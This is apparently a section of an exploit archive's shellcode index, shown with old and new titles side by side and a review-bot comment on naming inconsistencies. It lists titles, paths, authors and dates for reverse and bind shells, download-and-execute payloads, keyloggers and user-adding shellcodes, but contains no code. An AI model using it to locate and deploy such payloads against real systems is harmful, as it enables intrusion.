530 38239 shellcodes/linux_x86-64/38239.asm Linux/x86-64 - execve() Shellcode (22 bytes) Linux/x64 - execve() Shellcode (22 bytes) 2015-09-18 d4sh&r shellcode linux_x86-64
531 38469 shellcodes/linux_x86-64/38469.c Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes) Linux/x64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes) 2015-10-15 d4sh&r shellcode linux_x86-64
532 38708 shellcodes/linux_x86-64/38708.asm Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes) Linux/x64 - Egghunter (0x6b634068) Shellcode (24 bytes) 2015-11-16 d4sh&r shellcode linux_x86-64
533 38815 shellcodes/linux_x86-64/38815.c Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes) Linux/x64 - execve() + Polymorphic Shellcode (31 bytes) 2015-11-25 d4sh&r shellcode linux_x86-64
534 38959 shellcodes/generator/38959.py Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator) Windows (XP < 10) - Command Generator WinExec() + Null-Free Shellcode (Generator) 2015-12-13 B3mB4m shellcode generator
535 39149 shellcodes/linux_x86-64/39149.c Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) 2016-01-01 Scorpion_ shellcode linux_x86-64
536 39152 shellcodes/linux_x86-64/39152.c Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes) 2016-01-02 Sathish kumar shellcode linux_x86-64
537 39160 shellcodes/linux_x86/39160.c Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1) 2016-01-04 Dennis 'dhn' Herrmann shellcode linux_x86
538 39185 shellcodes/linux_x86-64/39185.c Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) 2016-01-06 Sathish kumar shellcode linux_x86-64
539 39203 shellcodes/linux_x86-64/39203.c Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes) Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes) 2016-01-08 Sathish kumar shellcode linux_x86-64
540 39204 shellcodes/linux_x86/39204.c Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes) 2016-01-08 Dennis 'dhn' Herrmann shellcode linux_x86
541 39312 shellcodes/linux_x86-64/39312.c Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes) 2016-01-25 Sathish kumar shellcode linux_x86-64
542 39336 shellcodes/linux/39336.c Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes) Linux x86/x64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes) 2016-01-27 B3mB4m shellcode linux
543 39337 shellcodes/linux/39337.c Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes) Linux x86/x64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes) 2016-01-27 B3mB4m shellcode linux
544 39338 shellcodes/linux/39338.c Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes) Linux x86/x64 - Read /etc/passwd Shellcode (156 bytes) 2016-01-27 B3mB4m shellcode linux
545 39383 shellcodes/linux_x86-64/39383.c Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) 2016-01-29 Sathish kumar shellcode linux_x86-64
546 39388 shellcodes/linux_x86-64/39388.c Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) 2016-02-01 Sathish kumar shellcode linux_x86-64
547 39389 shellcodes/linux_x86/39389.c Linux/x86 - Download File + Execute Shellcode (135 bytes) 2016-02-01 B3mB4m shellcode linux_x86
548 39390 shellcodes/linux_x86-64/39390.c Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes) Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes) 2016-02-01 Sathish kumar shellcode linux_x86-64
549 39496 shellcodes/arm/39496.c Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes) 2016-02-26 Xeon shellcode arm
550 39519 shellcodes/windows_x86/39519.c Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes) 2016-03-02 Sean Dillon shellcode windows_x86
551 39578 shellcodes/linux_x86-64/39578.c Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes) Linux/x64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes) 2016-03-21 Sudhanshu Chauhan shellcode linux_x86-64
552 39617 shellcodes/linux_x86-64/39617.c Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes) Linux/x64 - execve(/bin/sh) Shellcode (26 bytes) 2016-03-24 Ajith Kp shellcode linux_x86-64
553 39624 shellcodes/linux_x86-64/39624.c Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1) Linux/x64 - execve(/bin/sh) Shellcode (25 bytes) (1) 2016-03-28 Ajith Kp shellcode linux_x86-64
554 39625 shellcodes/linux_x86-64/39625.c Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes) Linux/x64 - execve(/bin/bash) Shellcode (33 bytes) 2016-03-28 Ajith Kp shellcode linux_x86-64
555 39684 shellcodes/linux_x86-64/39684.c Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes) Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes) 2016-04-11 Ajith Kp shellcode linux_x86-64
556 39700 shellcodes/linux_x86-64/39700.c Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes) Linux/x64 - Read /etc/passwd Shellcode (65 bytes) 2016-04-15 Ajith Kp shellcode linux_x86-64
557 39718 shellcodes/linux_x86-64/39718.c Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes) Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes) 2016-04-21 Ajith Kp shellcode linux_x86-64
558 40094 shellcodes/windows_x86/40094.c Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes) Windows/x86 - URLDownloadToFileA(http://192.168.86.130/sample.exe) + SetFileAttributesA(pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes) 2016-07-13 Roziul Hasan Khan Shifat shellcode windows_x86
559 39722 shellcodes/linux_x86/39722.c Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes) 2016-04-25 Roziul Hasan Khan Shifat shellcode linux_x86
560 39723 shellcodes/linux_x86/39723.c Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes) 2016-04-25 Roziul Hasan Khan Shifat shellcode linux_x86
561 39728 shellcodes/generator/39728.py Linux/x86-64 - Bind TCP Shell Shellcode (Generator) Linux/x64 - Bind TCP Shell Shellcode (Generator) 2016-04-25 Ajith Kp shellcode generator
562 39731 shellcodes/windows/39731.c Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes) 2016-04-25 Fugu shellcode windows
563 39754 shellcodes/windows_x86/39754.txt Windows/x86 (.Net Framework) - Execute Native x86 Shellcode 2016-05-02 Jacky5112 shellcode windows_x86
564 39758 shellcodes/linux_x86-64/39758.c Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes) Linux/x64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes) 2016-05-04 Roziul Hasan Khan Shifat shellcode linux_x86-64
565 39763 shellcodes/linux_x86-64/39763.c Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes) Linux/x64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes) 2016-05-04 Roziul Hasan Khan Shifat shellcode linux_x86-64
566 39794 shellcodes/windows/39794.c Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes) 2016-05-10 Fugu shellcode windows
567 39815 shellcodes/generator/39815.c Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator) 2016-05-16 JollyFrogs shellcode generator
568 39847 shellcodes/linux_x86-64/39847.c Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes) Linux/x64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes) 2016-05-23 Roziul Hasan Khan Shifat shellcode linux_x86-64
569 39851 shellcodes/linux_x86/39851.c Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes) 2016-05-25 Brandon Dennis shellcode linux_x86
570 39869 shellcodes/linux_x86-64/39869.c Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes) Linux/x64 - execve() + XOR Encoded Shellcode (84 bytes) 2016-05-30 Roziul Hasan Khan Shifat shellcode linux_x86-64
571 39885 shellcodes/multiple/39885.c BSD / Linux / Windows/x86-64/x86 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) BSD / Linux / Windows - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) 2016-06-06 odzhancode shellcode multiple
572 39900 shellcodes/windows_x86/39900.c Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes) 2016-06-07 Roziul Hasan Khan Shifat shellcode windows_x86
573 39901 shellcodes/linux_x86/39901.c Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes) 2016-06-07 sajith shellcode linux_x86
574 39914 shellcodes/windows_x86/39914.c Windows/x86 - system(systeminfo) Shellcode (224 bytes) 2016-06-10 Roziul Hasan Khan Shifat shellcode windows_x86
575 39979 shellcodes/windows/39979.c Windows (XP < 10) - Download File + Execute Shellcode 2016-06-20 B3mB4m shellcode windows
576 40005 shellcodes/windows_x86/40005.c Windows/x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes) 2016-06-22 Roziul Hasan Khan Shifat shellcode windows_x86
577 40026 shellcodes/linux_x86/40026.txt Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode 2016-06-27 Pawan Lal shellcode linux_x86
578 40029 shellcodes/linux_x86-64/40029.c Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes) Linux/x64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes) 2016-06-28 Roziul Hasan Khan Shifat shellcode linux_x86-64
579 40052 shellcodes/linux_x86-64/40052.c Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes) Linux/x64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes) 2016-07-04 Kyzer shellcode linux_x86-64
580 40056 shellcodes/linux_x86/40056.c Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes) 2016-07-04 sajith shellcode linux_x86
581 40061 shellcodes/linux_x86-64/40061.c Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes) Linux/x64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes) 2016-07-06 Kyzer shellcode linux_x86-64
582 40075 shellcodes/linux_x86/40075.c Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes) 2016-07-08 sajith shellcode linux_x86
583 40079 shellcodes/linux_x86-64/40079.c Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes) Linux/x64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes) 2016-07-11 Kyzer shellcode linux_x86-64
584 40110 shellcodes/linux_x86/40110.c Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes) 2016-07-13 RTV shellcode linux_x86
585 40122 shellcodes/linux_x86-64/40122.txt shellcodes/linux_x86-64/40122.c Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes) Linux/x64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes) 2016-07-19 Kyzer shellcode linux_x86-64
586 40128 shellcodes/linux_crisv32/40128.c Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes) 2016-07-20 bashis shellcode linux_crisv32
587 40131 shellcodes/linux_x86/40131.c Linux/x86 - execve(/bin/sh) Shellcode (19 bytes) 2016-07-20 sajith shellcode linux_x86
588 40139 shellcodes/linux_x86-64/40139.c Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes) Linux/x64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes) 2016-07-21 Kyzer shellcode linux_x86-64
589 40175 shellcodes/windows_x86/40175.c Windows/x86 (7) - localhost Port Scanner Shellcode (556 bytes) 2016-07-29 Roziul Hasan Khan Shifat shellcode windows_x86
590 40179 shellcodes/linux_x86/40179.c Linux/x86 - Bind TCP/UDP (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes) 2016-07-29 Kyzer shellcode linux_x86
591 40222 shellcodes/linux_x86/40222.c Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes) 2016-08-10 thryb shellcode linux_x86
592 40223 shellcodes/linux_x86/40223.c Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes) 2016-08-10 thryb shellcode linux_x86
593 40245 shellcodes/windows_x86/40245.c Windows/x86 - MessageBoxA Shellcode (242 bytes) Windows/x86 - MessageBoxA() Shellcode (242 bytes) 2016-08-16 Roziul Hasan Khan Shifat shellcode windows_x86
594 40246 shellcodes/windows_x86/40246.c Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes) 2016-08-16 Roziul Hasan Khan Shifat shellcode windows_x86
595 40259 shellcodes/windows_x86/40259.c Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes) 2016-08-18 Roziul Hasan Khan Shifat shellcode windows_x86
596 43562 shellcodes/linux_x86-64/43562.c Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes) Linux/x64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
597 43563 shellcodes/linux_x86-64/43563.c Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes) Linux/x64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
598 43564 shellcodes/linux_x86-64/43564.c Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes) Linux/x64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
599 43565 shellcodes/linux_x86-64/43565.asm Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes) Linux/x64 - Read /etc/passwd Shellcode (82 bytes) 2009-01-01 Mr.Un1k0d3r shellcode linux_x86-64
600 43566 shellcodes/linux_x86-64/43566.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
601 43568 shellcodes/linux_x86-64/43568.asm Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes) Linux/x64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes) 2009-01-01 Andriy Brukhovetskyy shellcode linux_x86-64
602 43570 shellcodes/linux_x86-64/43570.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes) 2009-01-01 Andriy Brukhovetskyy shellcode linux_x86-64
603 43597 shellcodes/linux_x86-64/43597.c Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes) Linux/x64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes) 2009-01-01 Geyslan G. Bem shellcode linux_x86-64
604 43598 shellcodes/linux_x86-64/43598.c Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes) Linux/x64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes) 2012-10-04 Russell Willis shellcode linux_x86-64
605 43599 shellcodes/linux_x86-64/43599.c Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes) Linux/x64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes) 2012-10-04 Russell Willis shellcode linux_x86-64
606 43601 shellcodes/linux_x86-64/43601.asm Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes) Linux/x64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes) 2009-01-01 Gaussillusion shellcode linux_x86-64
607 43602 shellcodes/linux_x86-64/43602.asm Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes) Linux/x64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes) 2009-01-01 Gaussillusion shellcode linux_x86-64
608 43603 shellcodes/linux_x86-64/43603.c Linux/x86-64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes) Linux/x64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes) 2009-01-01 egeektronic shellcode linux_x86-64
609 43604 shellcodes/linux_x86-64/43604.c Linux/x86-64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes) Linux/x64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes) 2009-01-01 egeektronic shellcode linux_x86-64
610 43605 shellcodes/linux_x86-64/43605.c Linux/x86-64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes) Linux/x64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes) 2009-01-01 egeektronic shellcode linux_x86-64
611 43606 shellcodes/linux_x86-64/43606.c Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes) Linux/x64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes) 2009-01-01 egeektronic shellcode linux_x86-64
612 43607 shellcodes/linux_x86-64/43607.c Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes) Linux/x64 - sethostname(Rooted !) + killall Shellcode (33 bytes) 2009-01-01 zbt shellcode linux_x86-64
613 43608 shellcodes/openbsd_x86/43608.c OpenBSD/x86 - reboot() Shellcode (15 bytes) 2009-01-01 beosroot shellcode openbsd_x86
614 43610 shellcodes/osx_ppc/43610.c OSX/PPC - Remote findsock by recv() Key Shellcode 2009-01-01 Dino Dai Zovi shellcode osx_ppc
615 43611 shellcodes/osx_ppc/43611.asm OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode 2009-01-01 H D Moore shellcode osx_ppc
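Review bot: rows 516 (37495) and 520 (37762) gain a "(Generator)" suffix in the title, but their paths stay under shellcodes/linux_x86/ and the platform column stays linux_x86, while the other generator entries in this range (38094.c, 38959.py, 39728.py, 39815.c) sit under shellcodes/generator/ with platform generator. Either move the two files and update the platform column, or drop the suffix, so that filtering on the platform column returns every generator. Separately, row 571 (39885) loses its architecture altogether, going from "BSD / Linux / Windows/x86-64/x86" to "BSD / Linux / Windows", and row 581 (40061) carries the spelling "Persistant" into the new title while row 585 (40122) uses "Persistent".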
755 43773 shellcodes/windows_x86/43773.c Windows/x86 (XP SP3) (English) - calc.exe Shellcode (16 bytes) 2010-07-10 John Leitch shellcode windows_x86
756 43774 shellcodes/windows_x86/43774.c Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes) 2009-01-01 d3c0der shellcode windows_x86
757 43778 shellcodes/arm/43778.asm Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes) 2018-01-15 rtmcx shellcode arm
758 40549 43890 shellcodes/windows_x86-64/40549.c shellcodes/linux_x86/43890.c Windows/x86-64 - WinExec(cmd.exe) Shellcode (93 bytes) Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes) 2016-10-17 2018-01-23 Roziul Hasan Khan Shifat Hashim Jawad shellcode windows_x86-64 linux_x86
759 40549 shellcodes/windows_x86-64/40549.c Windows/x64 - WinExec(cmd.exe) Shellcode (93 bytes) 2016-10-17 Roziul Hasan Khan Shifat shellcode windows_x86-64
760 40560 shellcodes/windows_x86/40560.asm Windows/x86 - Reverse UDP (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes) 2016-10-17 Fugu shellcode windows_x86
761 40781 shellcodes/windows_x86-64/40781.c Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes) Windows/x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes) 2016-11-18 Roziul Hasan Khan Shifat shellcode windows_x86-64
762 40808 shellcodes/linux_x86-64/40808.c Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes) Linux/x64 - execve(/bin/sh) -c reboot Shellcode (89 bytes) 2016-11-22 Ashiyane Digital Security Team shellcode linux_x86-64
763 40821 shellcodes/windows_x86-64/40821.c Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes) Windows/x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes) 2016-11-23 Roziul Hasan Khan Shifat shellcode windows_x86-64
764 40872 shellcodes/linux_x86/40872.c Linux/x86 - Reverse TCP Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes) 2016-12-05 Filippo Bersani shellcode linux_x86
765 40924 shellcodes/linux_x86/40924.c Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes) 2016-12-16 Filippo Bersani shellcode linux_x86
766 40981 shellcodes/windows_x86-64/40981.c Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes) Windows/x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes) 2017-01-01 Roziul Hasan Khan Shifat shellcode windows_x86-64
767 41072 shellcodes/windows_x86-64/41072.c Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes) Windows/x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes) 2017-01-15 Roziul Hasan Khan Shifat shellcode windows_x86-64
768 41089 shellcodes/linux_x86-64/41089.c Linux/x86-64 - mkdir() Shellcode (25 bytes) Linux/x64 - mkdir() Shellcode (25 bytes) 2017-01-18 Ajith Kp shellcode linux_x86-64
769 41128 shellcodes/linux_x86-64/41128.c Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes) Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes) 2017-01-19 Ajith Kp shellcode linux_x86-64
770 41174 shellcodes/linux_x86-64/41174.nasm Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes) Linux/x64 - execve(/bin/sh) Shellcode (22 bytes) 2017-01-26 Robert L. Taylor shellcode linux_x86-64
771 41183 shellcodes/linux/41183.c Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes) 2017-01-29 odzhancode shellcode linux
772 41220 shellcodes/generator/41220.c Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator) 2017-02-02 odzhancode shellcode generator
773 41282 shellcodes/linux_x86/41282.nasm Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes) 2017-02-08 Snir Levi shellcode linux_x86
774 41375 shellcodes/linux/41375.c Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes) 2017-02-16 odzhancode shellcode linux
775 41381 shellcodes/windows_x86/41381.c Windows/x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes) 2017-02-17 Ege Balci shellcode windows_x86
776 41398 shellcodes/linux_x86-64/41398.nasm Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes) 2017-02-19 Robert L. Taylor shellcode linux_x86-64
777 41403 shellcodes/linux_x86/41403.c Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes) 2017-02-20 lu0xheap shellcode linux_x86
778 41439 shellcodes/linux_x86-64/41439.c Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes) Linux/x64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes) 2017-02-23 odzhancode shellcode linux_x86-64
779 41467 shellcodes/windows_x86/41467.c Windows/x86 - Executable Directory Search + Null-Free Shellcode (130 bytes) 2017-02-26 lu0xheap shellcode windows_x86
780 41468 shellcodes/linux_x86-64/41468.nasm Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes) Linux/x64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes) 2017-02-26 Robert L. Taylor shellcode linux_x86-64
781 41477 shellcodes/linux_x86-64/41477.c Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes) Linux/x64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes) 2017-02-28 Manuel Mancera shellcode linux_x86-64
782 41481 shellcodes/windows_x86/41481.asm Windows/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes) 2017-03-01 Snir Levi shellcode windows_x86
783 41498 shellcodes/linux_x86-64/41498.nasm Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes) Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes) 2017-03-03 Robert L. Taylor shellcode linux_x86-64
784 41503 shellcodes/linux_x86-64/41503.nasm Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes) Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes) 2017-03-03 Robert L. Taylor shellcode linux_x86-64
785 41509 shellcodes/linux_x86-64/41509.nasm Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes) Linux/x64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes) 2017-03-04 Robert L. Taylor shellcode linux_x86-64
786 41510 shellcodes/linux_x86-64/41510.nsam Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes) Linux/x64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes) 2017-03-04 Robert L. Taylor shellcode linux_x86-64
